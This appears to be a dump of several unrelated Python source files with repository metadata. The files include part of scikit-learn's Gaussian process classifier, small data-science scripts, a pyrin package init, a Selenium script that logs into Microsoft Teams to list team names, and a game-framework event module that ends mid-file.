- np.log1p(np.exp(-(self.y_train_ * 2 - 1) * f)).sum() \
- np.log(np.diag(L)).sum()
# Check if we have converged (log marginal likelihood does
# not decrease)
# XXX: more complex convergence criterion
if lml - log_marginal_likelihood < 1e-10:
break
log_marginal_likelihood = lml
self.f_cached = f # Remember solution for later warm-starts
if return_temporaries:
return log_marginal_likelihood, (pi, W_sr, L, b, a)
else:
return log_marginal_likelihood
def _constrained_optimization(self, obj_func, initial_theta, bounds):
if self.optimizer == "fmin_l_bfgs_b":
opt_res = scipy.optimize.minimize(
obj_func, initial_theta, method="L-BFGS-B", jac=True,
bounds=bounds)
_check_optimize_result("lbfgs", opt_res)
theta_opt, func_min = opt_res.x, opt_res.fun
elif callable(self.optimizer):
theta_opt, func_min = \
self.optimizer(obj_func, initial_theta, bounds=bounds)
else:
raise ValueError("Unknown optimizer %s." % self.optimizer)
return theta_opt, func_min
class GaussianProcessClassifier(ClassifierMixin, BaseEstimator):
"""Gaussian process classification (GPC) based on Laplace approximation.
The implementation is based on Algorithm 3.1, 3.2, and 5.1 of
Gaussian Processes for Machine Learning (GPML) by Rasmussen and
Williams.
Internally, the Laplace approximation is used for approximating the
non-Gaussian posterior by a Gaussian.
Currently, the implementation is restricted to using the logistic link
function. For multi-class classification, several binary one-versus rest
classifiers are fitted. Note that this class thus does not implement
a true multi-class Laplace approximation.
Parameters
----------
kernel : kernel object
The kernel specifying the covariance function of the GP. If None is
passed, the kernel "1.0 * RBF(1.0)" is used as default. Note that
the kernel's hyperparameters are optimized during fitting.
optimizer : string or callable, optional (default: "fmin_l_bfgs_b")
Can either be one of the internally supported optimizers for optimizing
the kernel's parameters, specified by a string, or an externally
defined optimizer passed as a callable. If a callable is passed, it
must have the signature::
def optimizer(obj_func, initial_theta, bounds):
# * 'obj_func' is the objective function to be maximized, which
# takes the hyperparameters theta as parameter and an
# optional flag eval_gradient, which determines if the
# gradient is returned additionally to the function value
# * 'initial_theta': the initial value for theta, which can be
# used by local optimizers
# * 'bounds': the bounds on the values of theta
....
# Returned are the best found hyperparameters theta and
# the corresponding value of the target function.
return theta_opt, func_min
Per default, the 'L-BFGS-B' algorithm from scipy.optimize.minimize
is used. If None is passed, the kernel's parameters are kept fixed.
Available internal optimizers are::
'fmin_l_bfgs_b'
n_restarts_optimizer : int, optional (default: 0)
The number of restarts of the optimizer for finding the kernel's
parameters which maximize the log-marginal likelihood. The first run
of the optimizer is performed from the kernel's initial parameters,
the remaining ones (if any) from thetas sampled log-uniform randomly
from the space of allowed theta-values. If greater than 0, all bounds
must be finite. Note that n_restarts_optimizer=0 implies that one
run is performed.
max_iter_predict : int, optional (default: 100)
The maximum number of iterations in Newton's method for approximating
the posterior during predict. Smaller values will reduce computation
time at the cost of worse results.
warm_start : bool, optional (default: False)
If warm-starts are enabled, the solution of the last Newton iteration
on the Laplace approximation of the posterior mode is used as
initialization for the next call of _posterior_mode(). This can speed
up convergence when _posterior_mode is called several times on similar
problems as in hyperparameter optimization. See :term:`the Glossary
<warm_start>`.
copy_X_train : bool, optional (default: True)
If True, a persistent copy of the training data is stored in the
object. Otherwise, just a reference to the training data is stored,
which might cause predictions to change if the data is modified
externally.
random_state : int, RandomState instance or None, optional (default: None)
The generator used to initialize the centers.
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
multi_class : string, default : "one_vs_rest"
Specifies how multi-class classification problems are handled.
Supported are "one_vs_rest" and "one_vs_one". In "one_vs_rest",
one binary Gaussian process classifier is fitted for each class, which
is trained to separate this class from the rest. In "one_vs_one", one
binary Gaussian process classifier is fitted for each pair of classes,
which is trained to separate these two classes. The predictions of
these binary predictors are combined into multi-class predictions.
Note that "one_vs_one" does not support predicting probability
estimates.
n_jobs : int or None, optional (default=None)
The number of jobs to use for the computation.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
Attributes
----------
kernel_ : kernel object
The kernel used for prediction. In case of binary classification,
the structure of the kernel is the same as the one passed as parameter
but with optimized hyperparameters. In case of multi-class
classification, a CompoundKernel is returned which consists of the
different kernels used in the one-versus-rest classifiers.
log_marginal_likelihood_value_ : float
The log-marginal-likelihood of ``self.kernel_.theta``
classes_ : array-like of shape (n_classes,)
Unique class labels.
n_classes_ : int
The number of classes in the training data
Examples
--------
>>> from sklearn.datasets import load_iris
>>> from sklearn.gaussian_process import GaussianProcessClassifier
>>> from sklearn.gaussian_process.kernels import RBF
>>> X, y = load_iris(return_X_y=True)
>>> kernel = 1.0 * RBF(1.0)
>>> gpc = GaussianProcessClassifier(kernel=kernel,
... random_state=0).fit(X, y)
>>> gpc.score(X, y)
0.9866...
>>> gpc.predict_proba(X[:2,:])
array([[0.83548752, 0.03228706, 0.13222543],
[0.79064206, 0.06525643, 0.14410151]])
.. versionadded:: 0.18
"""
def __init__(self, kernel=None, optimizer="fmin_l_bfgs_b",
n_restarts_optimizer=0, max_iter_predict=100,
warm_start=False, copy_X_train=True, random_state=None,
multi_class="one_vs_rest", n_jobs=None):
self.kernel = kernel
self.optimizer = optimizer
self.n_restarts_optimizer = n_restarts_optimizer
self.max_iter_predict = max_iter_predict
self.warm_start = warm_start
self.copy_X_train = copy_X_train
self.random_state = random_state
self.multi_class = multi_class
self.n_jobs = n_jobs
def fit(self, X, y):
"""Fit Gaussian process classification model
Parameters
----------
X : array-like of shape (n_samples, n_features)
Training data
y : array-like of shape (n_samples,)
Target values, must be binary
Returns
-------
self : returns an instance of self.
"""
X, y = check_X_y(X, y, multi_output=False)
self.base_estimator_ = _BinaryGaussianProcessClassifierLaplace(
self.kernel, self.optimizer, self.n_restarts_optimizer,
self.max_iter_predict, self.warm_start, self.copy_X_train,
self.random_state)
self.classes_ = np.unique(y)
self.n_classes_ = self.classes_.size
if self.n_classes_ == 1:
raise ValueError("GaussianProcessClassifier requires 2 or more "
"distinct classes; got %d class (only class %s "
"is present)"
% (self.n_classes_, self.classes_[0]))
if self.n_classes_ > 2:
if self.multi_class == "one_vs_rest":
self.base_estimator_ = \
OneVsRestClassifier(self.base_estimator_,
n_jobs=self.n_jobs)
elif self.multi_class == "one_vs_one":
self.base_estimator_ = \
OneVsOneClassifier(self.base_estimator_,
n_jobs=self.n_jobs)
else:
raise ValueError("Unknown multi-class mode %s"
% self.multi_class)
self.base_estimator_.fit(X, y)
if self.n_classes_ > 2:
self.log_marginal_likelihood_value_ = np.mean(
[estimator.log_marginal_likelihood()
for estimator in self.base_estimator_.estimators_])
else:
self.log_marginal_likelihood_value_ = \
self.base_estimator_.log_marginal_likelihood()
return self
def predict(self, X):
"""Perform classification on an array of test vectors X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Returns
-------
C : ndarray of shape (n_samples,)
Predicted target values for X, values are from ``classes_``
"""
check_is_fitted(self)
X = check_array(X)
return self.base_estimator_.predict(X)
def predict_proba(self, X):
"""Return probability estimates for the test vector X.
Parameters
----------
X : array-like of shape (n_samples, n_features)
Returns
-------
C : array-like of shape (n_samples, n_classes)
Returns the probability of the samples for each class in
the model. The columns correspond to the classes in sorted
order, as they appear in the attribute :term:`classes_`.
"""
check_is_fitted(self)
if self.n_classes_ > 2 and self.multi_class == "one_vs_one":
raise ValueError("one_vs_one multi-class mode does not support "
"predicting probability estimates. Use "
"one_vs_rest mode instead.")
X = check_array(X)
return self.base_estimator_.predict_proba(X)
@property
def kernel_(self):
if self.n_classes_ == 2:
return self.base_estimator_.kernel_
else:
return CompoundKernel(
[estimator.kernel_
for estimator in self.base_estimator_.estimators_])
def log_marginal_likelihood(self, theta=None, eval_gradient=False,
clone_kernel=True):
"""Returns log-marginal likelihood of theta for training data.
In the case of multi-class classification, the mean log-marginal
        likelihood of the one-versus-rest classifiers is returned.
Parameters
----------
theta : array-like of shape (n_kernel_params,) or None
Kernel hyperparameters for which the log-marginal likelihood is
evaluated. In the case of multi-class classification, theta may
be the hyperparameters of the compound kernel or of an individual
            kernel. In the latter case, all individual kernels get assigned the
same theta values. If None, the precomputed log_marginal_likelihood
of ``self.kernel_.theta`` is returned.
eval_gradient : bool, default: False
If True, the gradient of the log-marginal likelihood with respect
to the kernel hyperparameters at position theta is returned
additionally. Note that gradient computation is not supported
for non-binary classification. If True, theta must not be None.
clone_kernel : bool, default=True
If True, the kernel attribute is copied. If False, the kernel
attribute is modified, but may result in a performance improvement.
Returns
-------
log_likelihood : float
Log-marginal likelihood of theta for training data.
log_likelihood_gradient : array, shape = (n_kernel_params,), optional
Gradient of the log-marginal likelihood with respect to the kernel
hyperparameters at position theta.
Only returned when eval_gradient is True.
"""
check_is_fitted(self)
if theta is None:
if eval_gradient:
raise ValueError(
"Gradient can only be evaluated for theta!=None")
return self.log_marginal_likelihood_value_
theta = np.asarray(theta)
if self.n_classes_ == 2:
return self.base_estimator_.log_marginal_likelihood(
theta, eval_gradient, clone_kernel=clone_kernel)
else:
if eval_gradient:
raise NotImplementedError(
"Gradient of log-marginal-likelihood not implemented for "
"multi-class GPC.")
estimators = self.base_estimator_.estimators_
n_dims = estimators[0].kernel_.n_dims
if theta.shape[0] == n_dims: # use same theta for all sub-kernels
return np.mean(
[estimator.log_marginal_likelihood(
theta, clone_kernel=clone_kernel)
for i, estimator in enumerate(estimators)])
elif theta.shape[0] == n_dims * self.classes_.shape[0]:
# theta for compound kernel
return np.mean(
[estimator.log_marginal_likelihood(
theta[n_dims * i:n_dims * (i + 1)],
clone_kernel=clone_kernel)
for i, estimator in enumerate(estimators)])
else:
raise ValueError("Shape of theta must be either %d or %d. "
"Obtained theta with shape %d."
% (n_dims, n_dims * self.classes_.shape[0],
theta.shape[0]))
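# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original class); it relies only on
# the public sklearn API already referenced in the class docstring, and the
# printed numbers depend on the installed scikit-learn version.
if __name__ == "__main__":
    from sklearn.datasets import load_iris
    from sklearn.gaussian_process import GaussianProcessClassifier
    from sklearn.gaussian_process.kernels import RBF
    X, y = load_iris(return_X_y=True)
    gpc = GaussianProcessClassifier(kernel=1.0 * RBF(1.0), random_state=0)
    gpc.fit(X, y)
    # Iris has three classes, so a one-vs-rest ensemble is fitted and kernel_
    # is a CompoundKernel built from the three optimized binary kernels.
    print(type(gpc.kernel_).__name__)
    # The stored value is the mean log-marginal likelihood of the binary
    # estimators; passing the compound theta re-evaluates the same quantity.
    print(gpc.log_marginal_likelihood_value_)
    print(gpc.log_marginal_likelihood(gpc.kernel_.theta))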
| 42.992248 | 79 | 0.617532 |
9fa5048233526e2d2c16a52a195f0721cc9bbea8 | 298 | py | Python | micone/pipelines/templates/otu_processing/export/biom2tsv.py | segrelab/MiCoNE | 91e0c5173293fc6584115036bba599097e4632da | [
"MIT"
] | 6 | 2020-09-23T20:07:13.000Z | 2021-04-20T22:10:07.000Z | micone/pipelines/templates/otu_processing/export/biom2tsv.py | segrelab/MiCoNE | 91e0c5173293fc6584115036bba599097e4632da | [
"MIT"
] | 36 | 2020-07-24T17:03:27.000Z | 2022-03-28T13:13:18.000Z | micone/pipelines/templates/otu_processing/export/biom2tsv.py | segrelab/MiCoNE | 91e0c5173293fc6584115036bba599097e4632da | [
"MIT"
] | 2 | 2020-06-07T23:17:39.000Z | 2021-03-28T15:04:19.000Z | #!/usr/bin/env python
from micone import Otu
def main(biom_file, base_name):
otu_biom = Otu.load_data(biom_file)
otu_biom.write(base_name=base_name, file_type="tsv")
if __name__ == "__main__":
BIOM_FILE = "${otu_file}"
BASE_NAME = "${tax_level}"
main(BIOM_FILE, BASE_NAME)
| 19.866667 | 56 | 0.691275 |
36dd41adef683dcf3b70cb3e1855492cb7786d09 | 762 | py | Python | spot_check_regression_algorithm_linear_regression.py | PacktPublishing/Machine-Learning-and-Data-Science-with-Python-A-Complete-Beginners-Guide | 1ffe8bbbd1963e5bea4a37a79dd87aa0d54b298f | [
"MIT"
] | 9 | 2019-12-23T22:25:11.000Z | 2022-02-25T14:54:43.000Z | spot_check_regression_algorithm_linear_regression.py | PacktPublishing/Machine-Learning-and-Data-Science-with-Python-A-Complete-Beginners-Guide | 1ffe8bbbd1963e5bea4a37a79dd87aa0d54b298f | [
"MIT"
] | 1 | 2019-09-22T14:05:42.000Z | 2020-12-31T11:55:42.000Z | spot_check_regression_algorithm_linear_regression.py | PacktPublishing/Machine-Learning-and-Data-Science-with-Python-A-Complete-Beginners-Guide | 1ffe8bbbd1963e5bea4a37a79dd87aa0d54b298f | [
"MIT"
] | 9 | 2019-08-01T22:54:08.000Z | 2022-01-05T13:57:17.000Z | # -*- coding: utf-8 -*-
"""
@author: abhilash
"""
# Cross Validation Regression MSE
from pandas import read_csv
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.linear_model import LinearRegression
filename = 'BostonHousing.csv'
names = ['CRIM', 'ZN', 'INDUS', 'CHAS', 'NOX', 'RM', 'AGE', 'DIS', 'RAD', 'TAX', 'PTRATIO','B', 'LSTAT', 'MEDV']
dataframe = read_csv(filename, names=names)
array = dataframe.values
X = array[:,0:13]
Y = array[:,13]
kfold = KFold(n_splits=10, random_state=7)
model = LinearRegression()
scoring = 'neg_mean_squared_error'
results = cross_val_score(model, X, Y, cv=kfold, scoring=scoring)
print("Mean Squared Error Linear Regression: %f " % (results.mean())) | 38.1 | 113 | 0.704724 |
9790eecd9b84a3146c5067028bd5cff041711070 | 1,413 | py | Python | src/pyrin/security/__init__.py | wilsonGmn/pyrin | 25dbe3ce17e80a43eee7cfc7140b4c268a6948e0 | [
"BSD-3-Clause"
] | null | null | null | src/pyrin/security/__init__.py | wilsonGmn/pyrin | 25dbe3ce17e80a43eee7cfc7140b4c268a6948e0 | [
"BSD-3-Clause"
] | null | null | null | src/pyrin/security/__init__.py | wilsonGmn/pyrin | 25dbe3ce17e80a43eee7cfc7140b4c268a6948e0 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
security package.
"""
import pyrin.application.services as application_services
from pyrin.packaging.base import Package
class SecurityPackage(Package):
"""
security package class.
"""
NAME = __name__
COMPONENT_NAME = 'security.component'
CONFIG_STORE_NAMES = ['security']
DEPENDS = ['pyrin.configuration',
'pyrin.cli']
def _load_configs(self, config_services):
"""
loads all required configs of this package.
this method is intended for overriding by
subclasses to do custom configurations.
:param Module config_services: configuration services dependency.
                                       to overcome the circular dependency problem, we
                                       inject the configuration services dependency into
                                       this method. because all other packages reference
                                       the `packaging.base` module, we can't import
                                       `pyrin.configuration.services` in this module.
                                       injecting the dependency is cleaner than importing
                                       it inside this method.
"""
flat_configs = config_services.get_all('security')
application_services.configure(flat_configs)
| 35.325 | 90 | 0.577495 |
7327e9469b555c05baba7059e277643180491c33 | 2,361 | py | Python | meetbot/one.py | satyamx/meetbot | 90f1ace6be5135a9789e194484b69eaad3389f18 | [
"MIT"
] | 24 | 2021-01-20T20:49:15.000Z | 2022-03-27T16:44:51.000Z | meetbot/one.py | satyamx/meetbot | 90f1ace6be5135a9789e194484b69eaad3389f18 | [
"MIT"
] | 3 | 2022-01-27T03:53:08.000Z | 2022-01-27T23:15:34.000Z | meetbot/one.py | satyamx/meetbot | 90f1ace6be5135a9789e194484b69eaad3389f18 | [
"MIT"
] | 1 | 2022-01-27T09:06:21.000Z | 2022-01-27T09:06:21.000Z | from selenium import webdriver
import os
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.common.exceptions import ElementClickInterceptedException
from selenium.webdriver.common.action_chains import ActionChains
import time
def chrome_options():
global options
options = webdriver.ChromeOptions()
options.add_argument("--no-sandbox")
options.add_argument("--headless")
options.add_argument("--disable-dev-shm-usage")
options.add_argument("--use-fake-ui-for-media-stream")
def bunk(email, password):
global teams
chrome_options()
PATH = '/usr/bin/chromedriver'
driver = webdriver.Chrome(executable_path=PATH, options=options)
driver.get("https://teams.microsoft.com/_#/school//?ctx=teamsGrid")
ignored_exceptions = (NoSuchElementException, StaleElementReferenceException, ElementClickInterceptedException)
email_element = WebDriverWait(driver, 50, ignored_exceptions=ignored_exceptions).until(
EC.presence_of_element_located((By.ID, "i0116"))
)
email_element.send_keys(email)
email_element.send_keys(Keys.RETURN)
time.sleep(3)
password_element = WebDriverWait(driver, 50, ignored_exceptions=ignored_exceptions).until(
EC.presence_of_element_located((By.ID, "i0118"))
)
password_element.send_keys(password)
time.sleep(3)
element = WebDriverWait(driver, 100, ignored_exceptions=ignored_exceptions).until(
EC.presence_of_element_located((By.ID, "idSIButton9"))
)
element.click()
time.sleep(3)
actions = ActionChains(driver)
actions.send_keys(Keys.RETURN)
actions.perform()
time.sleep(7)
try:
t4sne = WebDriverWait(driver, 50, ignored_exceptions=ignored_exceptions).until(
EC.presence_of_all_elements_located((By.CLASS_NAME, "team-name-text"))
)
teams = []
for i in t4sne:
teams.append(i.text)
driver.quit()
return teams
except TimeoutException:
message = 'Invalid credentials'
return message
| 35.772727 | 115 | 0.740364 |
5711e836cfe7b222b19312234efd389e9332d208 | 42,800 | py | Python | pytgf/logic/event.py | Youlixx/pytgf | ea0b5e45afb6da3368ef8e9f340dab26202caddb | [
"MIT"
] | 2 | 2020-07-07T00:23:29.000Z | 2021-03-16T18:42:04.000Z | pytgf/logic/event.py | Youlixx/pytgf | ea0b5e45afb6da3368ef8e9f340dab26202caddb | [
"MIT"
] | null | null | null | pytgf/logic/event.py | Youlixx/pytgf | ea0b5e45afb6da3368ef8e9f340dab26202caddb | [
"MIT"
] | null | null | null | """
Contains every class related to events and some basic key handlers
"""
import numpy
import json
class Event:
"""
The top level event type.
    Any event that occurs in the game can be represented using an Event. It can represent the entity interactions with
    the level or external user inputs. Custom events can be defined by extending this class. The events are handled
by the main event queue.
Attributes
----------
tick: int
The tick at which the event got fired.
"""
def __init__(self, tick: int):
"""
Initializes the Event.
Parameters
----------
tick: int
The tick at which the event got fired.
"""
self.tick = tick
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "Event[tick=" + str(self.tick) + "]"
class CancelableEvent(Event):
"""
A type of event that can be canceled.
Some events may be canceled during their processing by the event queue. When an CancelableEvent is canceled, it will
not be processed further by the next handlers of the event queue.
Attributes
----------
tick: int
The tick at which the event got fired.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __init__(self, tick: int):
"""
Initializes the CancelableEvent.
Parameters
----------
tick: int
The tick at which the event got fired.
"""
Event.__init__(self, tick)
self._canceled = False
def cancel(self) -> None:
"""
Cancels the event.
By canceling the event, it will not be processed by the other handlers of the EventQueue.
"""
self._canceled = True
def is_canceled(self) -> bool:
"""
Returns whether or not the event got canceled.
Returns
-------
canceled: bool
The state of the event, True if it got canceled and False otherwise.
"""
return self._canceled
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "CancelableEvent[tick=" + str(self.tick) + ", canceled=" + str(self._canceled) + "]"
class EventQueue:
"""
The event processing core.
When an event is created, it should be processed by the event queue. The event queue contains the list of different
user-defined handlers in which the new Event will be passed as argument.
Attributes
---------
history: list of Event
The list of fired events.
Methods
-------
register_event_handler(event_type, handler)
Registers a new event handler.
fire_event(event)
Handles a new fired Event.
"""
DEFAULT_HISTORY_LENGTH = 512
def __init__(self, history_length: int = DEFAULT_HISTORY_LENGTH):
"""
Initializes the EventQueue.
Parameters
----------
history_length: int, optional
The length of the event history.
"""
self._history_length = history_length
self._handlers = []
self.history = []
def __len__(self) -> int:
"""
Returns the length of the event history.
Returns
-------
length: int
The length of the event history.
"""
return len(self.history)
def register_event_handler(self, event_type: type, handler: callable) -> None:
"""
Registers a new event handler.
Registers a new handler for the specified event type. Every event that extends from the specified type will be
passed as argument to the handler when fired. The handler functions should only take one argument, the event
fired.
Parameters
----------
event_type: type
The type of event which will be passed to the handler when fired.
handler: callable
The handler function. This function should only take the event passed as argument.
"""
self._handlers.append((event_type, handler))
def fire_event(self, event: Event) -> None:
"""
Handles a new fired event.
        Passes the Event through the different registered handlers for the event type. The order of registration of the
        handlers is taken into account; using a CancelableEvent allows breaking out of the handler loop.
Parameters
----------
event: Event
The fired event.
"""
if len(self.history) == self._history_length:
del self.history[0]
self.history.append(event)
for event_type, handler in self._handlers:
if isinstance(event, event_type):
if isinstance(event, CancelableEvent):
if not event.is_canceled():
handler(event)
else:
handler(event)
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "EventQueue[]"
class Key:
"""
An enumeration containing the different key codes.
The user keyboard inputs are represented using key codes. The Key class stores the key codes of every possible input
that can be issued by the Window.
Methods
-------
get_corresponding_char(key_code)
Converts the key code into the associated character.
"""
KEY_BACKSPACE = 65288
KEY_TAB = 65289
KEY_LINEFEED = 65290
KEY_CLEAR = 65291
KEY_RETURN = 65293
KEY_ENTER = 65293
KEY_PAUSE = 65299
KEY_SCROLL_LOCK = 65300
KEY_SYS_REQ = 65301
KEY_ESCAPE = 65307
KEY_HOME = 65360
KEY_LEFT = 65361
KEY_UP = 65362
KEY_RIGHT = 65363
KEY_DOWN = 65364
KEY_PAGE_UP = 65365
KEY_PAGE_DOWN = 65366
KEY_END = 65367
KEY_BEGIN = 65368
KEY_DELETE = 65535
KEY_SELECT = 65376
KEY_PRINT = 65377
KEY_EXECUTE = 65378
KEY_INSERT = 65379
KEY_UNDO = 65381
KEY_REDO = 65382
KEY_MENU = 65383
KEY_FIND = 65384
KEY_CANCEL = 65385
KEY_HELP = 65386
KEY_BREAK = 65387
KEY_MODE_SWITCH = 65406
KEY_SCRIPT_SWITCH = 65406
KEY_MOTION_UP = 65362
KEY_MOTION_RIGHT = 65363
KEY_MOTION_DOWN = 65364
KEY_MOTION_LEFT = 65361
KEY_MOTION_NEXT_WORD = 1
KEY_MOTION_PREVIOUS_WORD = 2
KEY_MOTION_BEGINNING_OF_LINE = 3
KEY_MOTION_END_OF_LINE = 4
KEY_MOTION_NEXT_PAGE = 65366
KEY_MOTION_PREVIOUS_PAGE = 65365
KEY_MOTION_BEGINNING_OF_FILE = 5
KEY_MOTION_END_OF_FILE = 6
KEY_MOTION_BACKSPACE = 65288
KEY_MOTION_DELETE = 65535
KEY_NUM_LOCK = 65407
KEY_NUM_SPACE = 65408
KEY_NUM_TAB = 65417
KEY_NUM_ENTER = 65421
KEY_NUM_F1 = 65425
KEY_NUM_F2 = 65426
KEY_NUM_F3 = 65427
KEY_NUM_F4 = 65428
KEY_NUM_HOME = 65429
KEY_NUM_LEFT = 65430
KEY_NUM_UP = 65431
KEY_NUM_RIGHT = 65432
KEY_NUM_DOWN = 65433
KEY_NUM_PRIOR = 65434
KEY_NUM_PAGE_UP = 65434
KEY_NUM_NEXT = 65435
KEY_NUM_PAGE_DOWN = 65435
KEY_NUM_END = 65436
KEY_NUM_BEGIN = 65437
KEY_NUM_INSERT = 65438
KEY_NUM_DELETE = 65439
KEY_NUM_EQUAL = 65469
KEY_NUM_MULTIPLY = 65450
KEY_NUM_ADD = 65451
KEY_NUM_SEPARATOR = 65452
KEY_NUM_SUBTRACT = 65453
KEY_NUM_DECIMAL = 65454
KEY_NUM_DIVIDE = 65455
KEY_NUM_0 = 65456
KEY_NUM_1 = 65457
KEY_NUM_2 = 65458
KEY_NUM_3 = 65459
KEY_NUM_4 = 65460
KEY_NUM_5 = 65461
KEY_NUM_6 = 65462
KEY_NUM_7 = 65463
KEY_NUM_8 = 65464
KEY_NUM_9 = 65465
KEY_F1 = 65470
KEY_F2 = 65471
KEY_F3 = 65472
KEY_F4 = 65473
KEY_F5 = 65474
KEY_F6 = 65475
KEY_F7 = 65476
KEY_F8 = 65477
KEY_F9 = 65478
KEY_F10 = 65479
KEY_F11 = 65480
KEY_F12 = 65481
KEY_F13 = 65482
KEY_F14 = 65483
KEY_F15 = 65484
KEY_F16 = 65485
KEY_LEFT_SHIFT = 65505
KEY_RIGHT_SHIFT = 65506
KEY_LEFT_CTRL = 65507
KEY_RIGHT_CTRL = 65508
KEY_CAPS_LOCK = 65509
KEY_LEFT_META = 65511
KEY_RIGHT_META = 65512
KEY_LEFT_ALT = 65513
KEY_RIGHT_ALT = 65514
KEY_LEFT_WINDOWS = 65515
KEY_RIGHT_WINDOWS = 65516
KEY_LEFT_COMMAND = 65517
KEY_RIGHT_COMMAND = 65518
KEY_LEFT_OPTION = 65488
KEY_RIGHT_OPTION = 65489
KEY_SPACE = 32
KEY_EXCLAMATION = 33
KEY_DOUBLE_QUOTE = 34
KEY_HASH = 35
KEY_POUND = 35
KEY_DOLLAR = 36
KEY_PERCENT = 37
KEY_AMPERSAND = 38
KEY_APOSTROPHE = 39
KEY_LEFT_PARENTHESIS = 40
KEY_RIGHT_PARENTHESIS = 41
KEY_ASTERISK = 42
KEY_PLUS = 43
KEY_COMMA = 44
KEY_MINUS = 45
KEY_PERIOD = 46
KEY_SLASH = 47
KEY_COLON = 58
KEY_SEMICOLON = 59
KEY_LESS = 60
KEY_EQUAL = 61
KEY_GREATER = 62
KEY_QUESTION = 63
KEY_AT = 64
KEY_LEFT_BRACKET = 91
KEY_BACKSLASH = 92
KEY_RIGHT_BRACKET = 93
KEY_ASCII_CIRCUMFLEX = 94
KEY_UNDERSCORE = 95
KEY_GRAVE = 96
KEY_QUOTE_LEFT = 96
KEY_A = 97
KEY_B = 98
KEY_C = 99
KEY_D = 100
KEY_E = 101
KEY_F = 102
KEY_G = 103
KEY_H = 104
KEY_I = 105
KEY_J = 106
KEY_K = 107
KEY_L = 108
KEY_M = 109
KEY_N = 110
KEY_O = 111
KEY_P = 112
KEY_Q = 113
KEY_R = 114
KEY_S = 115
KEY_T = 116
KEY_U = 117
KEY_V = 118
KEY_W = 119
KEY_X = 120
KEY_Y = 121
KEY_Z = 122
KEY_LEFT_BRACE = 123
KEY_BAR = 124
KEY_RIGHT_BRACE = 125
KEY_ASCII_TILDE = 126
TABLE = {
KEY_SPACE: " ",
KEY_NUM_0: "0", KEY_NUM_1: "1", KEY_NUM_2: "2", KEY_NUM_3: "3", KEY_NUM_4: "4",
KEY_NUM_5: "5", KEY_NUM_6: "6", KEY_NUM_7: "7", KEY_NUM_8: "8", KEY_NUM_9: "9",
KEY_A: "a", KEY_B: "b", KEY_C: "c", KEY_D: "d", KEY_E: "e", KEY_F: "f", KEY_G: "g", KEY_H: "h", KEY_I: "i",
KEY_J: "j", KEY_K: "k", KEY_L: "l", KEY_M: "m", KEY_N: "n", KEY_O: "o", KEY_P: "p", KEY_Q: "q", KEY_R: "r",
KEY_S: "s", KEY_T: "t", KEY_U: "u", KEY_V: "v", KEY_W: "w", KEY_X: "x", KEY_Y: "y", KEY_Z: "z"
}
@staticmethod
def get_corresponding_char(key_code: int) -> str:
"""
Converts the key code into the associated character.
Looks up the key code in the class table and finds the corresponding character. If the key code is unknown, it
returns an empty string.
Parameters
----------
key_code
The code of the key.
Returns
-------
character: str
The character corresponding to the key code.
"""
if key_code in Key.TABLE:
return Key.TABLE[key_code]
return ""
class MouseButton:
"""
An enumeration containing the different mouse button codes.
    The user mouse button inputs are represented using button codes. The MouseButton class stores the button codes of every
possible input that can be issued by the Window.
"""
MOUSE_BUTTON_LEFT = 1
MOUSE_BUTTON_RIGHT = 4
MOUSE_BUTTON_MIDDLE = 2
class InputEvent(CancelableEvent):
"""
A generic type of event used for user input.
    This type of event is used for any event related to a user input. These events extend from CancelableEvent, hence
    they can be canceled while being processed by the event queue. This can be useful if more than one object interacts
    with the keyboard at once, by giving priority to one over the others.
Attributes
----------
tick: int
The tick at which the event got fired.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "InputEvent[tick=" + str(self.tick) + ", canceled=" + str(self._canceled) + "]"
class KeyEvent(InputEvent):
"""
A generic type of event used for key input.
    This type of event is used for any event related to the update of a key input. These events extend from
    CancelableEvent, hence they can be canceled while being processed by the event queue. This can be useful if more
    than one object interacts with the keyboard at once, by giving priority to one over the others.
Attributes
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key updated (see also Key).
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __init__(self, tick: int, key: int):
"""
Initializes the KeyEvent.
Parameters
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key updated (see also Key).
"""
CancelableEvent.__init__(self, tick)
self.key = key
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "KeyEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", canceled=" + str(self._canceled) + "]"
class KeyPressedEvent(KeyEvent):
"""
The type of KeyEvent used for key press event.
    This kind of event is fired whenever a key is being pressed. Unlike the KeyHeldEvent, this event is only issued
    once until the key is released.
Attributes
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key pressed.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
Returns a description string of the object.
Returns
-------
string: str
The string object description.
"""
return "KeyPressedEvent[tick=" + str(self.tick) + ", key=" + str(self.key) + ", " + \
"canceled=" + str(self._canceled) + "]"
class KeyReleasedEvent(KeyEvent):
"""
The type of KeyEvent used for key release event.
    This kind of event is fired whenever a key is being released. This event can only be fired after a KeyPressedEvent
is issued.
Attributes
----------
tick: int
The tick at which the event got fired.
key: int
The code of the key released.
Methods
-------
cancel()
Cancels the event.
is_canceled()
Returns whether or not the event got canceled.
"""
def __str__(self) -> str:
"""
